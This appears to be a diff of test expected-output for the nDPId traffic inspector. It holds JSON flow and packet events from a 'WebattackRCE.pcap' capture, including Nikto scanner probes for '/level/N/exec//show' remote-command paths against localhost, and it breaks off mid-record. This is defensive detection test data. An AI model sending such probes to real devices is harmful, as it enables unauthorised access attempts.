00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 